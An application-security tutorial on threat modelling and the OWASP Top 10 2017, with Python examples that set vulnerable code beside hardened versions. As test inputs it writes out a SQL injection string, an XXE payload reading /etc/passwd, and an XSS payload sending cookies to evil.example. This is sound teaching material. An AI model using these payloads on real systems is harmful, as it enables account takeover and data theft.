Application Security Basics
Maintaining application security is critical. Any breach can compromise your customers’ sensitive information, damage your organization’s reputation, jeopardize regulatory compliance, and result in massive fines.
To help ensure your applications meet the level of security your organization requires, you need to understand the:
- Most sensitive information.
- Potential threats.
- Consequences of any breach.
- Steps you will take to mitigate any issue or breach as quickly as possible.
STRIDE Threat Modeling for Application Security
Threat modeling is the process of identifying and prioritizing potential threats to your application from an attacker's perspective. To complete this step, you will need to ask questions such as:
- What information in your organization would a hacker seek?
- What path or tools could a hacker use to gain access to your applications and data?
- How will you know if an attack is taking place — or is successful?
STRIDE threat modeling is a popular approach that stands for:
- Spoofing identity: Assuming a person's or site's identity.
- Tampering with data: Modifying information or code.
- Repudiation: Denying or contesting specific actions or transactions.
- Information disclosure: Exposing information to unauthorized sources.
- Denial of service: Making your system unavailable to legitimate users, for example by crashing it or exhausting its resources.
- Elevation of privilege: Gaining elevated access to protected resources.
Risk Assessment Using the DREAD Framework
After categorizing all potential threats, it is important to assess all risks, based on:
- How likely it is that the threat will happen.
- The threat’s potential consequences.
- And whether the risk can be tolerated.
This exercise will determine which threats are the most urgent to address.
One of the most common mnemonic frameworks for risk assessment is DREAD, which stands for:
- Damage potential: How bad is the impact if the threat is realized?
- Reproducibility: How reliably can the attack be repeated?
- Exploitability: How much effort, skill, or tooling does the attack require?
- Affected users: How many users, or which users, would be affected?
- Discoverability: How easy is it for an attacker to find the weakness?
When you use the DREAD framework, you rank each characteristic on a scale of 1-10 or 1-5, depending on your preference. Keep in mind that the scale is subjective and will differ from one organization to another. The five rankings are added up for a final score to determine severity.
In addition to using the STRIDE and DREAD frameworks to understand and assess your risks, it is also helpful to use guidelines from the Open Web Application Security Project Foundation (OWASP).
OWASP Top 10 2017
The Open Web Application Security Project Foundation, or OWASP, is a non-profit organization aimed at spreading awareness of software security across the globe. In 2017, OWASP published the OWASP Top 10 list of the most common and critical security risks seen in web applications. It is a good idea to review the list to ensure you are aware of these threats and of the recommendations for preventing them.
OWASP rates each entry on exploitability, weakness prevalence, weakness detectability, and technical impact, using data it collected from the industry. Threat agents and business impact depend on your specific application, so those two factors are left for you to assess.
1. Injection
Injection flaws occur when hostile, untrusted data is sent to an interpreter as part of a command or query, tricking the interpreter into executing unintended commands or accessing data without proper authorization.
Often found in SQL, NoSQL, OS command, LDAP, and XPath queries, injection is highly prevalent, easy to exploit, and easy to detect. Code review is the most effective way to find these flaws, backed by automated scanning that exercises every parameter, header, cookie, and body field, so make both a regular part of your development process.
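As an added illustration (not code from the original page or from OpenLogic), the following Python script builds a constructed in-memory SQLite table of users and shows the same login query written the vulnerable way and the parameterised way, then feeds the classic "' OR '1'='1" input to both. Plaintext passwords appear only to keep the injection itself visible.

```python
import sqlite3


# Constructed sample data: an in-memory SQLite table standing in for the
# application's real user store. Plaintext passwords are used here only so the
# effect of the injection is easy to see.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Untrusted input is pasted into the query text, so the SQL interpreter
    # cannot distinguish the data from the command. This is the flaw.
    query = (
        "SELECT username, role FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Parameterised query: the values travel separately from the SQL text, so a
    # quote character in the input is matched literally instead of closing the
    # string and rewriting the WHERE clause.
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, payload))  # every row
    print("safe:      ", login_safe(db, payload, payload))        # no rows
```

With the payload in both fields the vulnerable query becomes "WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'", which is true for every row, so the attacker is logged in as the first user returned (here the admin). The parameterised version looks for a user literally named "' OR '1'='1" and finds nothing.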
2. Broken Authentication
Broken authentication occurs when functions related to authentication and session management are implemented incorrectly, allowing attackers to compromise passwords or keys. Attackers can also exploit authentication and session-management errors to assume a user’s identity, temporarily or permanently.
The exploitability and technical impact of broken authentication are high, with moderate prevalence and detectability. Straightforward mitigations include multi-factor authentication, rejecting weak and previously breached passwords, and limiting or delaying repeated failed login attempts.
3. Sensitive Data Exposure
Many web applications and APIs fail to properly protect sensitive data, including financial, healthcare, and other personal information. When proper security measures are not in place, attackers can access, steal, and modify data to conduct fraud, identity theft, or other crimes.
Encrypting data both at rest and in transit, and salting passwords, can help combat this risk.
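The weak-password check from the Broken Authentication entry and the salted password storage from this one fit naturally in a single piece of code. As an added example (not code from the original page or from OpenLogic), the following Python uses only the standard library: a constructed breached-password deny list stands in for a real corpus, the work factor is an assumption to tune for your hardware, and the stored record is self-describing so the factor can be raised later without invalidating old hashes.

```python
import hashlib
import hmac
import os

# Constructed deny list standing in for a real breached-password corpus.
BREACHED_PASSWORDS = {"password", "123456", "qwerty", "hunter2", "letmein"}
MIN_LENGTH = 12
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; assumption, tune to your hardware


def password_is_acceptable(password: str) -> bool:
    # A minimum length plus a breached-list check does more than composition rules:
    # strings like "P@ssw0rd1" satisfy most complexity policies yet sit in common wordlists.
    return len(password) >= MIN_LENGTH and password.lower() not in BREACHED_PASSWORDS


def hash_password(password: str) -> str:
    # A fresh random salt per user defeats precomputed (rainbow-table) attacks and
    # makes two users with the same password store different hashes.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # Self-describing record: algorithm, iterations, salt and digest.
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False  # malformed record: fail closed
    if algorithm != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison so a mismatch cannot be located byte by byte via timing.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
```

Two details matter in practice: never store or log the plaintext, and treat the deny list as a living input that you refresh from a breached-password source rather than a fixed set.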
4. XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references inside XML documents. An attacker who can submit XML, or XML-based formats such as SOAP, SVG, or Office documents, can declare an entity that points at a local file or an internal URL, and the parser will read it on the attacker's behalf. The result can be disclosure of internal files, scanning of internal ports and file shares, server-side request forgery, denial of service through entity expansion, and in some configurations remote code execution. The impact of a successful attack is significant, but the flaw is detectable: SAST tools find it by inspecting dependencies and parser configuration, and DAST tools can probe for it with some manual help. The most reliable fix is to disable DTD and external entity processing in every XML parser the application uses, and to prefer simpler formats such as JSON for untrusted input.
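Python's standard-library parsers do not fetch external entities on their own, but many other parsers do, and the portable fix is the same everywhere: refuse any document that carries a DTD, since that is the only place entities can be declared. As an added example (not code from the original page or from OpenLogic), the following Python enforces that policy with the standard library's expat bindings and shows it rejecting a constructed XXE payload while accepting an ordinary document. In a real project the defusedxml package implements the same idea with more coverage.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenDTD(ValueError):
    """Raised when a document carries a DOCTYPE, the only place entities can be declared."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise ForbiddenDTD(f"DOCTYPE {name!r} is not allowed in this input")


def parse_xml_no_dtd(data: str) -> ET.Element:
    # Pass 1: a bare expat parser whose only job is to abort on any DOCTYPE.
    # Refusing the DTD outright removes external entities (file and URL reads,
    # requests to internal ports) and entity-expansion denial of service together.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)
    # Pass 2: the document has no DTD, so the ordinary parser can build the tree.
    return ET.fromstring(data)


def accepts(data: str) -> bool:
    """True if the input parses under the no-DTD policy, False if it is rejected."""
    try:
        parse_xml_no_dtd(data)
        return True
    except (ForbiddenDTD, expat.ExpatError, ET.ParseError):
        return False


# Constructed inputs for illustration.
BENIGN = "<order><id>42</id><qty>3</qty></order>"
XXE_PAYLOAD = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<order><id>&xxe;</id></order>"
)

if __name__ == "__main__":
    print("benign accepted:", accepts(BENIGN))        # True
    print("xxe accepted:   ", accepts(XXE_PAYLOAD))   # False
```

The first pass costs a second parse of the input, which is cheap next to the alternative of trusting parser defaults you have not audited.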
5. Broken Access Control
Broken access control means a failure to enforce restrictions on what authenticated users are allowed to do, including which actions they may take and which systems and data they may reach. Attackers take advantage of these flaws to access other users' accounts, view sensitive files, change access rights, and modify data. The impact can range from moderate to severe, especially if an attacker gains administrative privileges and proceeds to access, create, update, and delete business records. Manual testing is the best way to detect missing or ineffective access control; automated scanners find little here because they cannot tell who should be allowed to see what.
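The most common form of this flaw is an insecure direct object reference: the record id comes from the request and nothing ties it to the caller. As an added example (not code from the original page or from OpenLogic), the following Python shows a lookup that trusts the id alone next to one that checks ownership, fails closed, and gives a missing record and a forbidden one the same answer. The records and users are constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    user_id: int
    role: str  # "user" or "admin"


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner_id: int
    amount: float


# Constructed sample records standing in for a database table.
INVOICES = {
    1001: Invoice(1001, owner_id=1, amount=250.0),
    1002: Invoice(1002, owner_id=2, amount=9900.0),
}


class Forbidden(PermissionError):
    pass


def get_invoice_vulnerable(invoice_id: int) -> Invoice:
    # The caller authenticated upstream, but nothing checks whether *this* user
    # may see *this* invoice, so any logged-in user can walk the id space.
    return INVOICES[invoice_id]


def get_invoice(current_user: User, invoice_id: int) -> Invoice:
    invoice = INVOICES.get(invoice_id)
    allowed = invoice is not None and (
        invoice.owner_id == current_user.user_id or current_user.role == "admin"
    )
    # Fail closed. A missing record and a forbidden one produce the same error,
    # so the response cannot be used to enumerate which ids exist.
    if not allowed:
        raise Forbidden(f"invoice {invoice_id} is not accessible")
    return invoice


def can_read_invoice(current_user: User, invoice_id: int) -> bool:
    try:
        get_invoice(current_user, invoice_id)
        return True
    except Forbidden:
        return False
```

In a real application the ownership rule lives in one place that every handler calls, and every denial is logged; a single forgotten check is all an attacker needs.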
6. Security Misconfiguration
Security misconfiguration includes insecure default configurations, incomplete or ad-hoc configurations, unprotected cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Such errors can occur at any level of your application stack, including operating systems, frameworks, libraries, and applications. And these types of errors can compromise your entire system. Security misconfiguration is extremely prevalent, detectable, and exploitable. Search engines and automated scanners can pick up these misconfigurations.
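Because these problems are detectable, a small automated check catches the common ones on every deployment. As an added example (not code from the original page or from OpenLogic), the following Python audits a response for missing or weak security headers, version banners, and a verbose error page, using two constructed responses: one as a default install would send it and one after hardening. The header policy is an assumption for the example; adjust it to your own baseline.

```python
# Constructed responses: one from a default install, one after hardening.
WEAK_RESPONSE = {
    "status": 500,
    "headers": {
        "Server": "Apache/2.4.41 (Ubuntu)",
        "X-Powered-By": "PHP/7.4.3",
        "Content-Type": "text/html",
    },
    "body": "Fatal error: Uncaught PDOException ... in /var/www/app/db.php on line 42\nStack trace:",
}
HARDENED_RESPONSE = {
    "status": 500,
    "headers": {
        "Content-Type": "text/html",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'self'",
        "X-Frame-Options": "DENY",
    },
    "body": "Something went wrong. Reference: 7f3a9c",
}

# Baseline policy (assumption for this example): each header must be present and
# its value must satisfy the check.
REQUIRED_HEADERS = {
    "Strict-Transport-Security": lambda v: "max-age=" in v.lower(),
    "X-Content-Type-Options": lambda v: v.strip().lower() == "nosniff",
    "Content-Security-Policy": lambda v: bool(v.strip()),
    "X-Frame-Options": lambda v: v.strip().upper() in {"DENY", "SAMEORIGIN"},
}
BANNER_HEADERS = ("Server", "X-Powered-By")
ERROR_LEAK_MARKERS = ("stack trace", "traceback", "exception", " on line ")


def audit_response(response: dict) -> list[str]:
    findings = []
    headers = {k.lower(): v for k, v in response["headers"].items()}
    for name, ok in REQUIRED_HEADERS.items():
        value = headers.get(name.lower())
        if value is None:
            findings.append(f"missing header: {name}")
        elif not ok(value):
            findings.append(f"weak value for {name}: {value!r}")
    for name in BANNER_HEADERS:
        if name.lower() in headers:
            findings.append(f"version banner exposed: {name}: {headers[name.lower()]}")
    body = response["body"].lower()
    if response["status"] >= 500 and any(m in body for m in ERROR_LEAK_MARKERS):
        findings.append("verbose error page: internals leaked in 5xx body")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp))
```

Run the same audit against a captured response from each environment; the point is that the check is repeatable, so a configuration that drifts after a framework upgrade is caught on the next run rather than by an attacker.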
7. Cross-Site Scripting
Also referred to as XSS, cross-site scripting flaws occur when an application includes untrusted data in a web page without proper validation or escaping, or updates an existing page with user-supplied data through a browser API that can create HTML or JavaScript. An attacker can then run scripts in the victim's browser to hijack the user's session, deface the site, or redirect the user to a malicious one. XSS is the second most prevalent issue in the 2017 list, found in around two thirds of applications, but it is also highly detectable: automated tools find reflected and stored XSS reliably, and modern frameworks escape output by default, so many remaining cases come from templates that bypass that escaping.
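As an added example (not code from the original page or from OpenLogic), the following Python renders a user comment into HTML first by plain concatenation and then with context-appropriate escaping, and runs two constructed attacker inputs through both: one aimed at element content, one at breaking out of a quoted attribute. The check at the end is deliberately crude and exists only to make the difference visible.

```python
import html


def render_comment_vulnerable(author: str, text: str) -> str:
    # Untrusted values are concatenated into the page as-is.
    return f'<p class="comment" data-author="{author}">{text}</p>'


def render_comment(author: str, text: str) -> str:
    # html.escape(quote=True) neutralises < > & and both quote characters, which is
    # correct for element content and for values inside *quoted* attributes.
    # Unquoted attributes, inline JavaScript and URLs each need their own encoding;
    # keep untrusted data out of those contexts rather than trying to escape for them.
    return (
        f'<p class="comment" data-author="{html.escape(author, quote=True)}">'
        f"{html.escape(text, quote=True)}</p>"
    )


def looks_injected(rendered: str) -> bool:
    # Crude marker check used only to show the difference: a raw script tag, or a
    # quote that closes the attribute followed by an event handler, means the
    # browser will treat attacker text as markup.
    lowered = rendered.lower()
    return "<script" in lowered or '" onmouseover=' in lowered


# Constructed attacker inputs.
BODY_PAYLOAD = "<script>document.location='https://evil.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" onmouseover="alert(document.domain)'

if __name__ == "__main__":
    print(render_comment_vulnerable(ATTR_PAYLOAD, BODY_PAYLOAD))
    print(render_comment(ATTR_PAYLOAD, BODY_PAYLOAD))
```

In practice you get this from the template engine's auto-escaping and reserve manual escaping for the rare places where raw output is unavoidable, so that the default path is the safe one.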
8. Insecure Deserialization
Insecure deserialization often leads to remote code execution, and can be used to perform replay attacks, injection attacks, and privilege escalation attacks. While it’s harder to exploit and isn’t as common as other types of security issues, insecure deserialization is also harder to detect — and the technical impact can be serious. Some tools have been developed to discover deserialization flaws, but human assistance is often needed for validation.
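As an added example (not code from the original page or from OpenLogic), the following Python shows why native serialization formats are dangerous and what the safer shape looks like. The malicious object uses pickle's __reduce__ hook, which is exactly the mechanism real gadget chains use; here the callable only records that it ran instead of executing a command. The hardened loader uses a data-only format (JSON), checks an HMAC before parsing, and validates the structure afterwards. The signing key is an assumption for the example.

```python
import hashlib
import hmac
import json
import pickle

EXECUTED = []  # records that attacker-supplied code ran; for demonstration only


def _attacker_callable(marker: str) -> str:
    # Stand-in for os.system or subprocess.Popen in a real gadget chain.
    EXECUTED.append(marker)
    return marker


class MaliciousPayload:
    # pickle stores the (callable, args) pair returned by __reduce__ and calls it on
    # load, so whoever controls the bytes controls what runs, with the app's privileges.
    def __reduce__(self):
        return (_attacker_callable, ("ran during unpickling",))


def load_session_vulnerable(blob: bytes) -> object:
    return pickle.loads(blob)  # never do this with data that crossed a trust boundary


# Hardened version: a data-only format, an integrity check before parsing, and
# a strict shape check after it. The key is an assumption for this example.
SESSION_KEY = b"example-server-side-secret-key"
ALLOWED_SHAPE = {"user_id": int, "role": str}


def seal_session(session: dict, key: bytes = SESSION_KEY) -> bytes:
    body = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return tag + b"." + body


def load_session_safe(blob: bytes, key: bytes = SESSION_KEY) -> dict:
    tag, _, body = blob.partition(b".")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("session integrity check failed")
    data = json.loads(body)  # JSON yields only plain data, never objects carrying code
    if not isinstance(data, dict) or set(data) != set(ALLOWED_SHAPE):
        raise ValueError("unexpected session structure")
    for field, expected_type in ALLOWED_SHAPE.items():
        if type(data[field]) is not expected_type:
            raise ValueError(f"bad type for {field}")
    return data


if __name__ == "__main__":
    load_session_vulnerable(pickle.dumps(MaliciousPayload()))
    print("code executed during load:", EXECUTED)
    print(load_session_safe(seal_session({"user_id": 7, "role": "user"})))
```

The integrity check matters even with JSON: without it an attacker can still edit the role field, which is the tampering and privilege escalation the text describes. The HMAC makes the server the only party that can produce a blob the loader will accept.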
9. Using Components With Known Vulnerabilities
One of the biggest security issues today comes from running components with known, unpatched vulnerabilities. Components such as libraries, frameworks, and other software modules run with the same privileges as the application that uses them, so running one with an open vulnerability exposes your applications and APIs to attack.
This is one of the most prevalent issues because IT teams often struggle to keep track of the frameworks and libraries in use across an organization and the updates each one needs. Prevention starts with an inventory of the components you use, including their versions and their own dependencies, continuous monitoring of vulnerability databases for those components, and a process for applying patches as soon as they are available.
10. Insufficient Monitoring and Logging
The average time it takes a company to discover a data breach is over 200 days, and the discovery is usually made by an external party rather than by internal monitoring. That is because many organizations lack effective monitoring and logging that flags suspicious activity, and many IT teams lack a process for investigating alerts, which prolongs the time to detection. The longer a breach goes undiscovered, the more time attackers have to pivot to other systems and to tamper with, extract, or destroy data.
This issue is highly prevalent, and the technical impact varies considerably. You can reduce time to detection by logging login, access control, and input validation failures with enough context to identify the account and source involved, by storing those logs centrally where an attacker on the application host cannot alter them, and by using penetration tests to confirm that the activity actually shows up in your monitoring.
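Logging is only half of the control; something has to read the logs. As an added example (not code from the original page or from OpenLogic), the following Python parses a constructed authentication log in a simple key=value format (an assumption; adapt the pattern to your own format) and flags a source address that fails logins against several accounts inside a short window, noting whether that source later succeeded, which is the signal that the burst may have worked.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not from any real system). One source
# address sprays failures across several accounts and then succeeds.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z auth result=fail user=alice src=203.0.113.7
2024-03-01T10:00:03Z auth result=fail user=bob src=203.0.113.7
2024-03-01T10:00:05Z auth result=fail user=carol src=203.0.113.7
2024-03-01T10:00:07Z auth result=success user=dave src=198.51.100.9
2024-03-01T10:00:09Z auth result=fail user=dave src=203.0.113.7
2024-03-01T10:00:11Z auth result=fail user=erin src=203.0.113.7
2024-03-01T10:00:13Z auth result=fail user=frank src=203.0.113.7
2024-03-01T10:00:20Z auth result=success user=frank src=203.0.113.7
2024-03-01T10:30:00Z auth result=fail user=alice src=198.51.100.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth result=(?P<result>\w+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_events(text: str) -> list[dict]:
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # in production, count unparseable lines; silent drops hide attacks
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)) -> list[dict]:
    """Flag a source with `threshold` failures inside `window`; note if it later succeeds."""
    recent_failures = defaultdict(list)  # src -> failure timestamps still inside the window
    users_seen = defaultdict(set)        # src -> accounts it has failed against
    alerts, flagged = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        src = ev["src"]
        if ev["result"] == "fail":
            q = recent_failures[src]
            q.append(ev["ts"])
            users_seen[src].add(ev["user"])
            while q and ev["ts"] - q[0] > window:
                q.pop(0)  # slide the window forward
            if len(q) >= threshold:
                alert = flagged.get(src)
                if alert is None:
                    alert = {"src": src, "first": q[0], "succeeded_after": False}
                    flagged[src] = alert
                    alerts.append(alert)
                alert.update(failures=len(q), last=ev["ts"], users=sorted(users_seen[src]))
        elif ev["result"] == "success" and src in flagged:
            flagged[src]["succeeded_after"] = True  # burst then a login: likely compromise
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_LOG)):
        print(alert)
```

The same sliding-window logic applies per account instead of per source to catch a slow attack on one user from many addresses; the lesson for logging is that both the account and the source have to be in every line for either query to be possible.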
Tools for Web App Security
To reduce the risk of security threats, you can also take the following steps:
- Practice against deliberately vulnerable targets such as Metasploitable2, an intentionally insecure virtual machine, to understand how issues are found, exploited, and fixed.
- Deploy OWASP's free, open source Zed Attack Proxy (ZAP) to crawl your site and take advantage of its active, passive, and manual security-testing tools.
In addition, you can watch the Application Security Basics webinar facilitated by John Saboe, an open source software Enterprise Architect at OpenLogic by Perforce. In it, he reviews security risks and explains how to use the OWASP Top 10 threat model to improve your organization’s IT security.